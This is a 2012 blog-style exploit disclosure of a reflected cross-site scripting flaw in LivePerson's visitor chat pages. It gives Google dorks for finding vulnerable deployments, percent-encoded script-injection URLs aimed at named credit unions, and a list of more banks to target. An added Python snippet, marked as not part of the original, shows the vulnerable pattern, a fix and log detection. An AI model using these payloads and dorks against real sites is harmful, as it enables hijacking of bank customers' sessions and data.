Wednesday, 14 March 2012

LivePerson Cross Site Scripting

# Exploit Title: LivePerson Cross Site Scripting
# Date: 15.03.2012
# Author: Sony

# Software Link: http://liveperson.com/
# Google Dorks: inurl:/window/top.asp?site= or inurl:/window/main.asp?site=
# Web Browser: Mozilla Firefox

# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/03/liveperson-cross-site-scripting.html
..................................................................

When you use the Google dorks, click on "If you like, you can repeat the search with the omitted results included."

Well, yeah, we can see cross-site scripting in LivePerson.

What is LivePerson?

http://en.wikipedia.org/wiki/LivePerson

Today I spoke with tech support and asked who uses LivePerson:

The fact that we currently have over 8,500 clients, including many Fortune 500 companies such as Verizon, Adobe, Cisco, Estee Lauder, Home Depot, Neiman Marcus, Panasonic, Bank of America, Chase, HSBC, Microsoft, HP, IBM, Hoovers and Citibank, is testimony to the quality of service, security and support we provide our customers. (c) Support

But well, now the demo:

Safe Credit Union
https://www.safecu.org/

http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475[our xss is here]&page=&loginsso=

What is 68511475? The site ID.

http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

American Airlines Federal Credit Union

https://www.aacreditunion.org/home.aspx

https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=
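As an added example (not part of the original post and not LivePerson's own code), here is the reflection pattern behind these URLs beside a hardened version, plus a log-review check that flags the two PoC requests above; the function names, the allowed site-ID shape and the sample request list are assumptions made for illustration.

```python
"""Defender-side illustration of the reflected XSS described in the post.
The `site` query parameter is written into a double-quoted HTML attribute; the PoC
value closes the attribute with ""> and appends a <script> element.
All names, the site-ID rule and the sample requests are assumptions, not LivePerson code."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Site IDs seen in the post are digits or [A-Za-z0-9_]; assumed as the allowed shape.
SITE_ID_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def is_valid_site_id(site: str) -> bool:
    """Allow-list check: True only for a plain site ID."""
    return SITE_ID_RE.match(site) is not None


def render_unsafe(site: str) -> str:
    """The vulnerable pattern: raw concatenation into an attribute value."""
    return f'<input type="hidden" name="site" value="{site}">'


def render_safe(site: str) -> str:
    """Hardened: reject malformed site IDs, then attribute-encode what remains."""
    if not is_valid_site_id(site):
        raise ValueError("invalid site id")
    return f'<input type="hidden" name="site" value="{html.escape(site, quote=True)}">'


def site_param_is_suspicious(url: str) -> bool:
    """Log review: True when the decoded `site` value is not a plain site ID."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)  # parse_qs percent-decodes
    return any(not is_valid_site_id(v) for v in params.get("site", []))


def flag_suspicious(urls):
    """Return the requests whose `site` parameter carries something other than a site ID."""
    return [u for u in urls if site_param_is_suspicious(u)]


# Constructed sample: one benign request followed by the two PoC URLs quoted in the post.
SAMPLE_REQUESTS = [
    "http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475&page=&loginsso=",
    "http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=",
    "https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=",
]
```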


More?

Use the Google dorks. Among the results we can see:

Busey Bank
http://en.wikipedia.org/wiki/Busey_Bank (wow, 1868)

Del Norte Credit Union
https://www.dncu.org/

San Diego Metropolitan Credit Union
https://www.sdmcu.org/home/home

Bank Financial
https://www.bankfinancial.com/home/home

Baton Rouge Telco Federal Credit Union
http://www.brtelco.org/home/accounts

etc.
